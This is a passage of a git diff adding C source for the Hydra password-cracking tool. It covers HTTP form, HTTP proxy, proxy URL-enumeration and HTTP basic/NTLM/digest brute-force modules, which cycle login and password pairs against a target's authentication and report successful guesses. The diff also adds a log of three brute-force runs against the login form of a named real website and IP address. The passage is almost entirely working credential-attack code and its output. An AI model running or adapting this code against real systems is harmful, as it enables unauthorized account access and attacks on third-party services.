ptr; + } + } + if (strstr(cond, "\\:") != NULL) { + if ((ptr = malloc(strlen(cond))) != NULL) { // no need for +1 + strcpy(ptr, hydra_strrep(cond, "\\:", ":")); + cond = ptr; + } + } + if (url == NULL || variables == NULL || cond == NULL /*|| optional1 == NULL */ ) + hydra_child_exit(2); + +//printf("url: %s, var: %s, cond: %s, opt: %s\n", url, variables, cond, optional1); + + if (*cond == 0) { + fprintf(stderr, "[ERROR] invalid number of parameters in module option\n"); + hydra_child_exit(2); + } + + sprintf(cookieurl, "%.1000s", url); + + //conditions now have to contain F or S to set the fail or success condition + if (*cond != 0 && (strpos(cond, "F=") == 0)) { + success_cond = 0; + cond += 2; + } else if (*cond != 0 && (strpos(cond, "S=") == 0)) { + success_cond = 1; + cond += 2; + } else { + //by default condition is a fail + success_cond = 0; + } + + while ( /*(optional1 = strtok(NULL, ":")) != NULL */ *optional1 != 0) { + switch (optional1[0]) { + case 'c': // fall through + case 'C': + ptr = optional1 + 2; + while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\')) + ptr++; + if (*ptr != 0) + *ptr++ = 0; + sprintf(cookieurl, "%.1000s", hydra_strrep(optional1 + 2, "\\:", ":")); + optional1 = ptr; + break; + case 'h': // fall through + case 'H': + ptr = optional1 + 2; + while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\')) + ptr++; + if (*ptr != 0) + *ptr++ = 0; + ptr2 = ptr; + while (*ptr2 != 0 && (*ptr2 != ':' || *(ptr2 - 1) == '\\')) + ptr2++; + if (*ptr2 != 0) + *ptr2++ = 0; + if (sizeof(userheader) - strlen(userheader) > 4) { + strncat(userheader, optional1 + 2, sizeof(userheader) - strlen(userheader) - 4); + strcat(userheader, ":"); + strncat(userheader, hydra_strrep(ptr, "\\:", ":"), sizeof(userheader) - strlen(userheader) - 3); + strcat(userheader, "\r\n"); + } + optional1 = ptr2; + break; + // no default + } + } + + while (1) { + if (run == 2) { + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) { + if (freemischttpform) + free(miscptr); + freemischttpform = 0; + hydra_child_exit(1); + } + } + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + if (freemischttpform) + free(miscptr); + freemischttpform = 0; + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_http_form(sock, ip, port, options, miscptr, fp, type); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if (freemischttpform) + free(miscptr); + freemischttpform = 0; + hydra_child_exit(0); + break; + case 4: /* silent error exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if (freemischttpform) + free(miscptr); + freemischttpform = 0; + hydra_child_exit(1); + break; + default: + if (freemischttpform) + free(miscptr); + freemischttpform = 0; + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } + if (freemischttpform) + free(miscptr); +} + +void service_http_get_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_http_form(ip, sp, options, miscptr, fp, port, "GET"); +} + +void service_http_post_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_http_form(ip, sp, options, miscptr, fp, port, "POST"); +} + +int service_http_form_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-http-post-attack.txt b/hydra-http-post-attack.txt new file mode 100755 index 0000000..2c4d029 --- /dev/null +++ b/hydra-http-post-attack.txt @@ -0,0 +1,30 @@ +# Hydra v7.4 run at 2012-09-23 14:49:45 on pualounge.de http-post-form (hydra -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 5 +[80][www-form] host: 85.214.74.73 login: foo password: 9 +[80][www-form] host: 85.214.74.73 login: foo password: 2 +[80][www-form] host: 85.214.74.73 login: foo password: 6 +[80][www-form] host: 85.214.74.73 login: foo password: 3 +[80][www-form] host: 85.214.74.73 login: foo password: 1 +[80][www-form] host: 85.214.74.73 login: foo password: 8 +[80][www-form] host: 85.214.74.73 login: foo password: 7 +[80][www-form] host: 85.214.74.73 login: foo password: 4 +[80][www-form] host: 85.214.74.73 login: foo password: 10 +# Hydra v7.4 run at 2012-09-23 14:50:25 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 2 +[80][www-form] host: 85.214.74.73 login: foo password: 1 +[80][www-form] host: 85.214.74.73 login: foo password: 3 +[80][www-form] host: 85.214.74.73 login: foo password: 4 +[80][www-form] host: 85.214.74.73 login: foo password: 5 +[80][www-form] host: 85.214.74.73 login: foo password: 7 +[80][www-form] host: 85.214.74.73 login: foo password: 6 +[80][www-form] host: 85.214.74.73 login: foo password: 8 +[80][www-form] host: 85.214.74.73 login: foo password: 9 +[80][www-form] host: 85.214.74.73 login: foo password: 10 +# Hydra v7.4 run at 2012-09-23 14:50:33 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 3 +[80][www-form] host: 85.214.74.73 login: foo password: 1 +[80][www-form] host: 85.214.74.73 login: foo password: 4 +[80][www-form] host: 85.214.74.73 login: foo password: 2 +[80][www-form] host: 85.214.74.73 login: foo password: 5 +[80][www-form] host: 85.214.74.73 login: foo password: 7 +[80][www-form] host: 85.214.74.73 login: foo password: 8 +[80][www-form] host: 85.214.74.73 login: foo password: 9 +[80][www-form] host: 85.214.74.73 login: foo password: 6 +[80][www-form] host: 85.214.74.73 login: foo password: 10 diff --git a/hydra-http-proxy-urlenum.c b/hydra-http-proxy-urlenum.c new file mode 100644 index 0000000..3fa1e47 --- /dev/null +++ b/hydra-http-proxy-urlenum.c @@ -0,0 +1,288 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; +char *buf; +static int http_proxy_auth_mechanism = AUTH_ERROR; + +int start_http_proxy_urlenum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[500], buffer2[500], mlogin[260], mpass[260], mhost[260]; + char url[260], host[30]; + char *header = ""; /* XXX TODO */ + char *ptr; + int auth = 0; + + login = hydra_get_next_login(); + if (login == NULL || strlen(login) == 0 || strstr(login, "://") == NULL) { + hydra_completed_pair(); + return 1; + } + pass = hydra_get_next_password(); + pass = empty; // ignored + + strncpy(url, login, sizeof(url) - 1); + url[sizeof(url) - 1] = 0; + ptr = strstr(login, "://") + 3; + if (ptr[0] == '[') + ptr++; + strncpy(mhost, ptr, sizeof(mhost) - 1); + mhost[sizeof(mhost) - 1] = 0; + if ((ptr = index(mhost, '/')) != NULL) + *ptr = 0; + if ((ptr = index(mhost, ']')) != NULL) + *ptr = 0; + else if ((ptr = index(mhost, ':')) != NULL) + *ptr = 0; + + if (miscptr != NULL && index(miscptr, ':') != NULL) { + strncpy(mlogin, miscptr, sizeof(mlogin) - 1); + mlogin[sizeof(mlogin) - 1] = 0; + ptr = index(mlogin, ':'); + *ptr++ = 0; + strncpy(mpass, ptr, sizeof(mpass) - 1); + mpass[sizeof(mpass) - 1] = 0; + auth = 1; + } + + if (http_proxy_auth_mechanism == AUTH_ERROR) { + //send dummy request + sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, mhost, header); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + //receive first 40x + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (debug) + hydra_report(stderr, "S:%s\n", buf); + + //after the first query we should have been disconnected from web server + s = hydra_disconnect(s); + if ((options & OPTION_SSL) == 0) { + s = hydra_connect_tcp(ip, port); + } else { + s = hydra_connect_ssl(ip, port); + } + } + + if (auth) { + if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) { + http_proxy_auth_mechanism = AUTH_BASIC; + sprintf(buffer2, "%.50s:%.50s", login, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header); + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + //if server cut the connection, just exit cleanly or + //this will be an infinite loop + if (buf == NULL) { + if (verbose) + hydra_report(stderr, "[ERROR] Server did not answer\n"); + return 3; + } + + if (debug) + hydra_report(stderr, "S:%s\n", buf); + } else { + if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) { + unsigned char buf1[4096]; + unsigned char buf2[4096]; + char *pos = NULL; + + http_proxy_auth_mechanism = AUTH_NTLM; + //send auth and receive challenge + //send auth request: let the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + + /* to be portable, no snprintf, buffer is big enough so it cant overflow */ + //send the first.. + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, + header); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + //receive challenge + buf = hydra_receive_line(s); + while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + if (pos != NULL) { + char *str; + + pos += 25; + if ((str = strchr(pos, '\r')) != NULL) { + pos[str - pos] = 0; + } + if ((str = strchr(pos, '\n')) != NULL) { + pos[str - pos] = 0; + } + } + //recover challenge + if (buf != NULL) { + from64tobits((char *) buf1, pos); + free(buf); + } + //Send response + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, + header); + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (buf == NULL) + return 1; + } else { +#ifdef LIBOPENSSL + if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) { + char *pbuffer; + + http_proxy_auth_mechanism = AUTH_DIGESTMD5; + pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest "); + strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header); + if (buffer2 == NULL) + return 3; + + if (debug) + hydra_report(stderr, "C:%s\n", buffer2); + if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0) + return 1; + + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (debug && buf != NULL) + hydra_report(stderr, "S:%s\n", buf); + + if (buf == NULL) + return 1; + + } else +#endif + { + if (buf != NULL) { + buf[strlen(buf) - 1] = '\0'; + hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf); + } else { + hydra_report(stderr, "Unsupported Auth type\n"); + } + return 3; + } + } + } + } + // result analysis + ptr = ((char *) index(buf, ' ')) + 1; + if (*ptr == '2' || (*ptr == '3' && (*(ptr + 2) == '1' || *(ptr + 2) == '2')) || strncmp(ptr, "404", 4) == 0 || strncmp(ptr, "403", 4) == 0) { + hydra_report_found_host(port, ip, "http-proxy", fp); + if (fp != stdout) + fprintf(fp, "[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url); + printf("[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url); + hydra_completed_pair_found(); + } else { + if (strncmp(ptr, "407", 3) == 0 /*|| strncmp(ptr, "401", 3) == 0 */ ) { + hydra_report(stderr, "[ERROR] Proxy reports bad credentials!\n"); + return 3; + } + hydra_completed_pair(); + } + + free(buf); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_http_proxy_urlenum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_http_proxy_urlenum(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_http_proxy_urlenum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-http-proxy.c b/hydra-http-proxy.c new file mode 100644 index 0000000..79c6cdb --- /dev/null +++ b/hydra-http-proxy.c @@ -0,0 +1,270 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; +char *buf; +static int http_proxy_auth_mechanism = AUTH_ERROR; + +int start_http_proxy(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[500], buffer2[500]; + char url[210], host[30]; + char *header = ""; /* XXX TODO */ + char *ptr; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + if (miscptr == NULL) { + strcpy(url, "http://www.microsoft.com/"); + strcpy(host, "Host: www.microsoft.com\r\n"); + } else { + sprintf(url, "%.200s", miscptr); + ptr = strstr(miscptr, "://"); // :// check is in hydra.c + sprintf(host, "Host: %.200s", ptr + 3); + if ((ptr = index(host, '/')) != NULL) + *ptr = 0; + if ((ptr = index(host + 6, ':')) != NULL && host[0] != '[') + *ptr = 0; + strcat(host, "\r\n"); + } + + if (http_proxy_auth_mechanism == AUTH_ERROR) { + //send dummy request + sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, header); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + //receive first 40x + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (debug) + hydra_report(stderr, "S:%s\n", buf); + + //after the first query we should have been disconnected from web server + s = hydra_disconnect(s); + if ((options & OPTION_SSL) == 0) { + s = hydra_connect_tcp(ip, port); + } else { + s = hydra_connect_ssl(ip, port); + } + } + + if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) { + http_proxy_auth_mechanism = AUTH_BASIC; + sprintf(buffer2, "%.50s:%.50s", login, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header); + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + //if server cut the connection, just exit cleanly or + //this will be an infinite loop + if (buf == NULL) { + if (verbose) + hydra_report(stderr, "[ERROR] Server did not answer\n"); + return 3; + } + + if (debug) + hydra_report(stderr, "S:%s\n", buf); + } else { + if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) { + + unsigned char buf1[4096]; + unsigned char buf2[4096]; + char *pos = NULL; + + http_proxy_auth_mechanism = AUTH_NTLM; + //send auth and receive challenge + //send auth request: let the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + + /* to be portable, no snprintf, buffer is big enough so it cant overflow */ + //send the first.. + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + //receive challenge + buf = hydra_receive_line(s); + while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + if (pos != NULL) { + char *str; + + pos += 25; + if ((str = strchr(pos, '\r')) != NULL) { + pos[str - pos] = 0; + } + if ((str = strchr(pos, '\n')) != NULL) { + pos[str - pos] = 0; + } + } + //recover challenge + if (buf != NULL) { + from64tobits((char *) buf1, pos); + free(buf); + } + //Send response + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header); + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (buf == NULL) + return 1; + } else { +#ifdef LIBOPENSSL + if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) { + + char *pbuffer; + + http_proxy_auth_mechanism = AUTH_DIGESTMD5; + pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest "); + strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header); + if (buffer2 == NULL) + return 3; + + if (debug) + hydra_report(stderr, "C:%s\n", buffer2); + if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0) + return 1; + + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (debug && buf != NULL) + hydra_report(stderr, "S:%s\n", buf); + + if (buf == NULL) + return 1; + + } else +#endif + { + if (buf != NULL) { + buf[strlen(buf) - 1] = '\0'; + hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf); + } else { + hydra_report(stderr, "Unsupported Auth type\n"); + } + return 3; + } + } + } + + ptr = ((char *) index(buf, ' ')) + 1; + if (*ptr == '2' || (*ptr == '3' && *(ptr + 2) == '1') || (*ptr == '3' && *(ptr + 2) == '2')) { + hydra_report_found_host(port, ip, "http-proxy", fp); + hydra_completed_pair_found(); + } else { + if (*ptr != '4') + hydra_report(stderr, "[INFO] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass); + else if (verbose && *(ptr + 2) == '3') + hydra_report(stderr, "[INFO] Potential success, could be false positive: %s:%s\n", login, pass); + hydra_completed_pair(); + } + + free(buf); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_http_proxy(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_http_proxy(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_http_proxy_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-http.c b/hydra-http.c new file mode 100644 index 0000000..1d54d31 --- /dev/null +++ b/hydra-http.c @@ -0,0 +1,318 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; +char *buf = NULL; +char *webtarget = NULL; +char *slash = "/"; +int webport, freemischttp = 0; + +int http_auth_mechanism = AUTH_BASIC; + +int start_http(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) { + char *empty = ""; + char *login, *pass, buffer[500], buffer2[500]; + char *header = ""; /* XXX TODO */ + char *ptr; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + // we must reset this if buf is NULL and we do MD5 digest + if (buf == NULL && http_auth_mechanism == AUTH_DIGESTMD5) + http_auth_mechanism = AUTH_BASIC; + + switch (http_auth_mechanism) { + case AUTH_BASIC: + sprintf(buffer2, "%.50s:%.50s", login, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + + /* again: no snprintf to be portable. dont worry, buffer cant overflow */ + if (use_proxy == 1 && proxy_authentication != NULL) + sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buffer2, proxy_authentication, header); + else { + if (use_proxy == 1) + sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buffer2, header); + else + sprintf(buffer, "%s %.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", type, miscptr, webtarget, buffer2, header); + } + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + break; + +#ifdef LIBOPENSSL + case AUTH_DIGESTMD5:{ + char *pbuffer; + + pbuffer = hydra_strcasestr(buf, "WWW-Authenticate: Digest "); + strncpy(buffer, pbuffer + strlen("WWW-Authenticate: Digest "), sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, type, webtarget, webport, header); + if (buffer2 == NULL) { + return 3; + } + + if (debug) + hydra_report(stderr, "C:%s\n", buffer2); + strcpy(buffer, buffer2); + } + break; +#endif + + case AUTH_NTLM:{ + unsigned char buf1[4096]; + unsigned char buf2[4096]; + char *pos = NULL; + + //send auth and receive challenge + //send auth request: let the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + + /* to be portable, no snprintf, buffer is big enough so it cant overflow */ + //send the first.. + if (use_proxy == 1 && proxy_authentication != NULL) + sprintf(buffer, + "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header); + else { + if (use_proxy == 1) + sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buf1, header); + else + sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget, + buf1, header); + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + + //receive challenge + if (buf != NULL) + free(buf); + buf = hydra_receive_line(s); + while (buf != NULL && (pos = hydra_strcasestr(buf, "WWW-Authenticate: NTLM ")) == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + if (buf == NULL) + return 1; + + if (pos != NULL) { + char *str; + + pos += 23; + if ((str = strchr(pos, '\r')) != NULL) { + pos[str - pos] = 0; + } + if ((str = strchr(pos, '\n')) != NULL) { + pos[str - pos] = 0; + } + } + //recover challenge + from64tobits((char *) buf1, pos); + free(buf); + buf = NULL; + + //Send response + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + + //create the auth response + if (use_proxy == 1 && proxy_authentication != NULL) + sprintf(buffer, + "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header); + else { + if (use_proxy == 1) + sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", + type, webtarget, webport, miscptr, webtarget, buf1, header); + else + sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget, + buf1, header); + } + + if (debug) + hydra_report(stderr, "C:%s\n", buffer); + } + break; + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + + if (buf != NULL) + free(buf); + buf = hydra_receive_line(s); + while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) { + free(buf); + buf = hydra_receive_line(s); + } + + //if server cut the connection, just exit cleanly or + //this will be an infinite loop + if (buf == NULL) { + if (verbose) + hydra_report(stderr, "[ERROR] Server did not answer\n"); + return 3; + } + + if (debug) + hydra_report(stderr, "S:%s\n", buf); + + ptr = ((char *) index(buf, ' ')) + 1; + if (ptr != NULL && (*ptr == '2' || *ptr == '3' || strncmp(ptr, "403", 3) == 0 || strncmp(ptr, "404", 3) == 0)) { + 